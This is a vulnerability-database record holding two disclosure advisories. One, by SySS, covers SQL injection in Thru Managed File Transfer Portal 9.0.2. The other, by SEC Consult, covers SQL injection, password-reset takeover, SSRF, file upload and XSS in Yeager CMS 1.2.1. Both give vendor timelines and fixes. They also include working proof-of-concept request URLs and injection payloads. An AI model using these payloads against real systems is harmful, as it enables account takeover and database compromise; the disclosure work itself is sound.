{"hash": "c9425d381d9674acda0e468f108eab9598521859911817b465ebcb8296caffe0", "id": "1337DAY-ID-24928", "lastseen": "2018-04-11T11:48:05", "viewCount": 0, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "087a30ec07604e839bc297281ea2486d", "key": "description"}, {"hash": "d47435ce0d47d1002f52c5b2343473ae", "key": "href"}, {"hash": "4436f7953d6998adb8faa154b60ffc20", "key": "modified"}, {"hash": "4436f7953d6998adb8faa154b60ffc20", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "73fafaa1f4078c3fb4d8724dc56b48b8", "key": "reporter"}, {"hash": "f5da78676f744892d6c373f9e9e0e36c", "key": "sourceData"}, {"hash": "8cd902ef69f693cc7a4359ab1600da0f", "key": "sourceHref"}, {"hash": "67cd93f378a0c783897c2ab20c688507", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"score": {"value": 4.3, "vector": "NONE"}, "vulnersScore": 4.3}, "type": "zdt", "sourceHref": "https://0day.today/exploit/24928", "description": "Exploit for asp platform in category web applications", "title": "Thru Managed File Transfer Portal 9.0.2 - SQL Injection", "history": [{"bulletin": {"hash": "328bcc6c09ede5232ab4fe45b13ab8715cfc6089894be6173e26b15f563920fe", "id": "1337DAY-ID-24928", "lastseen": "2016-04-20T00:06:39", "enchantments": {"score": {"value": 2.8, "vector": "AV:N/AC:M/Au:M/C:N/I:N/A:P/", "modified": "2016-04-20T00:06:39"}}, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "baa4c82e0ddd2fd55d02d987a316a555", "key": "cvelist"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "c934a665cfb64276555c8d56e39c4aa5", "key": "href"}, {"hash": "2b60b00759afb585c56fac9f12d81e5c", "key": "published"}, {"hash": "5b96d94c06a00f14cd5a135cd91a8d24", "key": "reporter"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "2b60b00759afb585c56fac9f12d81e5c", "key": "modified"}, {"hash": "24f6fea61cbf044ea9ec7fa99ffd8dc7", "key": "description"}, {"hash": "88703995b016e3bc72b058e6facdd4c5", "key": "sourceData"}, {"hash": "03a17bcdcbd7eabc0f263964fcce1898", "key": "sourceHref"}, {"hash": "4c43f9e7a465f2090d4a2f150b7bd944", "key": "title"}], "bulletinFamily": "exploit", "history": [], "edition": 1, "type": "zdt", "sourceHref": "http://0day.today/exploit/24928", "description": "Yeager CMS version 1.2.1 suffers from cross site scripting, remote file upload, server-side request forgery, and remote SQL injection vulnerabilities.", "viewCount": 0, "title": "Yeager CMS 1.2.1 - Multiple Vulnerabilities", "cvss": {"score": 0.0, "vector": "NONE"}, "objectVersion": "1.0", "cvelist": ["CVE-2015-7569", "CVE-2015-7571", "CVE-2015-7572", "CVE-2015-7570", "CVE-2015-7568", "CVE-2015-7567"], "sourceData": "title: Multiple Vulnerabilities\r\n product: Yeager CMS\r\n vulnerable version: 1.2.1\r\n fixed version: 1.3\r\n CVE number: CVE-2015-7567, CVE-2015-7568, CVE-2015-7569, CVE-2015-7570\r\n,\r\n CVE-2015-7571, CVE-2015-7572\r\n impact: Critical\r\n homepage: http://yeager.cm/en/home/\r\n found: 2015-11-18\r\n by: P. Morimoto (Office Bangkok)\r\n SEC Consult Vulnerability Lab\r\n \r\n An integrated part of SEC Consult\r\n Bangkok - Berlin - Frankfurt/Main - Montreal - Moscow\r\n Singapore - Vienna (HQ) - Vilnius - Zurich\r\n \r\n https://www.sec-consult.com\r\n \r\n=======================================================================\r\n \r\nVendor description:\r\n-------------------\r\nYeager is an open source CMS that aims to become the most cost/time-effective\r\nsolution for medium and large web sites and applications.\r\n \r\n \r\nBusiness recommendation:\r\n------------------------\r\nYeager CMS suffers from multiple vulnerabilities due to improper input\r\nvalidation and unprotected test scripts. By exploiting these vulnerabilities\r\nan attacker could:\r\n 1. Change user's passwords including the administrator's account.\r\n 2. Gain full access to the Yeager CMS database.\r\n 3. Determine internal servers that inaccessible from the Internet.\r\n 4. Attack other users of the Yeager CMS with Cross-Site Scripting.\r\n \r\nSEC Consult recommends not to use this software until a thorough security\r\nreview has been performed by security professionals and all identified\r\nissues have been resolved.\r\n \r\nVulnerability overview/description:\r\n-----------------------------------\r\n1. Unauthenticated Blind SQL Injection (CVE-2015-7567, CVE-2015-7568)\r\n2. Post-authentication Blind SQL Injection (CVE-2015-7569)\r\n3. Unauthenticated Arbitrary File Upload (CVE-2015-7571)\r\n4. Unauthenticated Server-side Request Forgery (CVE-2015-7570)\r\n5. Non-permanent Cross-site Scripting (CVE-2015-7572)\r\n \r\n \r\nProof of concept:\r\n-----------------\r\n1. Unauthenticated Blind SQL Injection (CVE-2015-7567, CVE-2015-7568)\r\nhttp://<host>/yeager/?action=passwordreset&token=<SQL Injection>\r\nhttp://<host>/yeager/y.php/responder?handler=setNewPassword&us=sess_20000&lh=70\r\n&data=[\"noevent\",{\"yg_property\":\"setNewPassword\",\"params\":{\"userToken\":\"<SQL\r\nInjection>\"}}]\r\n \r\nThe vulnerability can also be used for unauthorized reset password of any user.\r\nIn order to reset a specific user's password, an attacker will need to provide\r\na valid email address of the user that he wants to attack.\r\nThe email can be retrieved by either social engineering or using the\r\naforementioned unauthenticated SQL injection vulnerability.\r\n \r\nhttp://<host>/yeager/y.php/responder?handler=recoverLogin&us=sess_20000&lh=70&d\r\nata=[\"noevent\",{\"yg_property\":\"recoverLogin\",\"params\":{\"userEmail\":\"<victim@ema\r\nil.com>\",\"winID\":\"1\"}}]\r\n \r\nThe above URL just simply creates and sends a reset password token to the\r\nuser's email. Next, even if attacker does not know the token,\r\nmanipulating SQL commands allows to force to set the new password instantly.\r\n \r\nNote that new password MUST be at least 8 characters in length\r\nand must contain both letters and numbers.\r\n \r\nhttp://<host>/yeager/y.php/responder?handler=setNewPassword&us=sess_20000&lh=70\r\n&data=[\"noevent\",{\"yg_property\":\"setNewPassword\",\"params\":{\"userToken\":\"'+or+ui\r\nd=(select+id+from+yg_user+where+login='<victim@email.com>')+limit+1--+-\",\"userP\r\nassword\":\"<new-password>\",\"winID\":\"1\"}}]\r\n \r\n2. Post-authentication Blind SQL Injection (CVE-2015-7569)\r\nhttp://<host>/yeager/y.php/tab_USERLIST\r\nPOST Data:\r\nwin_no=4&yg_id=2-user&yg_type=user&wid=wid_4&refresh=1&initload=&us=sess_16000&\r\nlh=325&pagedir_page=2&pagedir_perpage=1&pagedir_orderby=<SQL\r\nInjection>&pagedir_orderdir=4&pagedir_from=5&pagedir_limit=6,7&newRole=1\r\n \r\n3. Unauthenticated Arbitrary File Upload (CVE-2015-7571)\r\nA publicly known Arbitrary File Upload vulnerability of Plupload was found in\r\nYeager CMS.\r\nFortunately, to successfully exploit the vulnerability requires PHP directive\r\n\"upload_tmp_dir\" set to an existing directory and it must contain the writable\r\ndirectory \"plupload\".\r\n \r\nBy default, the PHP directive \"upload_tmp_dir\" is an empty value.\r\nAs a result, the script will attempt to upload a file to /plupload/ instead\r\nwhich generally does not exist on the filesystem.\r\n \r\nhttp://<host>/yeager/ui/js/3rd/plupload/examples/upload.php\r\n \r\n4. Unauthenticated Server-side Request Forgery (CVE-2015-7570)\r\nhttp://<host>/yeager/libs/org/adodb_lite/tests/test_adodb_lite.php\r\nhttp://<host>/yeager/libs/org/adodb_lite/tests/test_datadictionary.php\r\nhttp://<host>/yeager/libs/org/adodb_lite/tests/test_adodb_lite_sessions.php\r\n \r\nThe parameter \"dbhost\" can be used to perform internal port scan using\r\ntime delay measurement. An attacker can provide internal IP address\r\nand port number, for example, 10.10.0.1:22. The attacker then compares\r\ntime delays from multiple responses in order to determine host\r\nand port availability.\r\n \r\n5. Non-permanent Cross-site Scripting (CVE-2015-7572)\r\nA previously published XSS vulnerability of Plupload was found in Yeager CMS.\r\nhttp://<host>/yeager/ui/js/3rd/plupload/js/plupload.flash.swf?id=\\%22%29%29;}ca\r\ntch%28e%29{alert%28/XSS/%29;}//\r\n \r\n \r\nVulnerable / tested versions:\r\n-----------------------------\r\nThe vulnerabilities have been tested on Yeager CMS 1.2.1\r\n \r\nURL: http://yeager.cm/en/download/package/?v=1.2.1.0.0\r\n \r\n \r\nVendor contact timeline:\r\n------------------------\r\n2015-12-07: Contacting vendor through office@nexttuesday.de, contact@yeager.cm\r\n2015-12-07: Established secure communication channel\r\n2015-12-07: Sending advisory draft\r\n2015-12-10: Yeager CMS 1.2.2 released for security fixes\r\n2015-12-22: Yeager CMS 1.3 released for security fixes\r\n2016-02-10: Public advisory release\r\n \r\nSolution:\r\n---------\r\nThe vulnerability has been fixed in Yeager CMS 1.3 and later.\r\n \r\nhttps://github.com/ygcm/yeager/commit/74e0ce518321e659cda54f3f565ca0ce8794dba8#\r\ndiff-4200a6e704ae66ada32f35f69796cc71\r\nhttps://github.com/ygcm/yeager/commit/053a3b98a9a3f4fd94186cbb8994de0a3e8d9307\r\n \r\nWorkaround:\r\n-----------\r\nNo workaround available.\n\n# 0day.today [2016-04-19] #", "published": "2016-02-10T00:00:00", "references": [], "reporter": "SEC Consult", "modified": "2016-02-10T00:00:00", "href": "http://0day.today/exploit/description/24928"}, "lastseen": "2016-04-20T00:06:39", "edition": 1, "differentElements": ["description", "cvelist", "published", "reporter", "modified", "sourceHref", "sourceData", "title", "href"]}], "objectVersion": "1.3", "cvelist": [], "sourceData": "Product: Thru Managed File Transfer Portal\r\nManufacturer: Thru\r\nAffected Version(s): 9.0.2\r\nTested Version(s): 9.0.2\r\nVulnerability Type: SQL Injection (CWE-89) \r\nRisk Level: High\r\nSolution Status: Open\r\nManufacturer Notification: 2015-10-28\r\nSolution Date: 2016-01-22\r\nPublic Disclosure: 2016-02-15\r\nCVE Reference: Not yet assigned\r\nAuthors of Advisory: Dr. Erlijn van Genuchten, Danny \u00d6sterreicher \r\n (SySS GmbH)\r\n \r\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n \r\nOverview:\r\n \r\nThru Managed File Transfer Portal is a web based file transfer application. \r\nAccording to the Thru website [1], the application aims to offload large \r\nfile transfer to a single platform, to protect files, to replace FTP \r\nservers and to allow access to files anytime, anywhere.\r\n \r\nAn SQL injection vulnerability was identified in one of the GET request.\r\n \r\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n \r\nVulnerability Details:\r\n \r\nThe SQL injection vulnerability was found in a GET request that causes \r\ncontact data to be sorted. At least the attribute values of sortorder\r\nand letterrange are not correctly sanitized and therefore can be abused\r\nto inject arbitrary SQL statements.\r\n \r\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n \r\nProof of Concept (PoC):\r\n \r\nThe following HTTP request can be used to show that the SQL statement \r\ncausing a delay is executed and results in a 500 server error:\r\n \r\nGET /App/asp///contacts.asp?sortorder=1;WAITFOR+DELAY+'0:0:5'--&letterrange=all&fromrec=0&torec=20 HTTP/1.1\r\nHost: [HOST]\r\nCookie: [COOKIES]\r\n \r\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n \r\nSolution:\r\n \r\nThe reported security vulnerability has been fixed in a new software\r\nrelease. Update to the new software version.\r\n \r\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n \r\nDisclosure Timeline:\r\n \r\n2015-10-27: Vulnerability discovered\r\n2015-10-28: Vulnerability reported to manufacturer\r\n2016-01-22: Manufacturer announced update\r\n2016-02-15: Public release of security advisory\r\n \r\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n \r\nReferences:\r\n \r\n[1] Thru Homepage\r\n http://www.thruinc.com\r\n[2] SySS Security Advisory SYSS-2015-056\r\n https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2015-056.txt\r\n[3] SySS Responsible Disclosure Policy\r\n https://www.syss.de/en/news/responsible-disclosure-policy/\n\n# 0day.today [2018-04-11] #", "published": "2016-02-22T00:00:00", "references": [], "reporter": "SySS GmbH", "modified": "2016-02-22T00:00:00", "href": "https://0day.today/exploit/description/24928"}

{}